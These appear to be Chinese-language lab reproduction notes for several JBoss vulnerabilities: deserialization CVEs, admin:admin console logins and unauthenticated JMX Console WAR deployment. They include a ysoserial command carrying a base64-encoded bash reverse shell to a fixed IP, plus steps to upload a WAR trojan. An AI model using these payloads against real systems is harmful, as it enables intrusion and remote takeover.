CVE-2015-7501
漏洞介绍
这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象, 然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码
影响范围
JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0
漏洞复现
访问网站
访问如下接口,发现可以下载,说明是存在漏洞的
下载 ysoserial
⼯具进⾏漏洞利⽤ https://github.com/frohoff/ysoserial
将要反弹的shell进行base64编码
这个工具需要再java环境下,所以运行命令为
java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjE1LjEzNi4yMTIvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i} ">exp.ser
CVE-2017-7504
漏洞介绍
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的 HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏ 任意代码执⾏
影响范围
JBoss 4.x 以及之前的所有版本
漏洞复现
继续访问
访问如下路径:
下载工具jexboss
用法python3 jexboss.py -u http://1.15.136.212:8080/
CVE-2017-12149
漏洞简述
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过 滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化,从⽽导 致了漏洞
漏洞范围
JBoss 5.x/6.x
漏洞复现
可以利用专门检测该漏洞的检测工具进行检查和利用
Administration Console弱⼝令
漏洞描述
Administration Console管理⻚⾯存在弱⼝令,`admin:admin`,登陆后台上传war包 , getshell
影响版本
全版本
漏洞复现
1.登录后台 admin vulhub
点击web应⽤ ,上传war木马
访问,连接
低版本JMX Console未授权
漏洞描述
此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导 致攻击者可以进⼊到 jmx控制台,并在其中执⾏任何功能。
影响范围
44 Jboss4.x以下
漏洞复现
这⾥我们使⽤得复现环境不存在,所以需要密码(正常环境⽆需密码直接可进⼊)admin/admin
找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进 去(通过URL的⽅式远程部署)
制作war包 , 这⾥⽤之前制作好的 peak.war , 然后⽤ python 开启web服务 python3 -m http.server
找到:void addURL()
输入war包地址,点击invoke
跳转之后用工具连接
⾼版本JMX Console未授权
漏洞描述
JMX Console默认存在未授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚ ⾯, 通过部署war包 , getshell
影响版本
Jboss6.x以下
漏洞复现
和低版本的差不多,最重要的区别是
在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,
进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏ 远程部署
继续搭建远程服务,war包,然后invoke,工具连接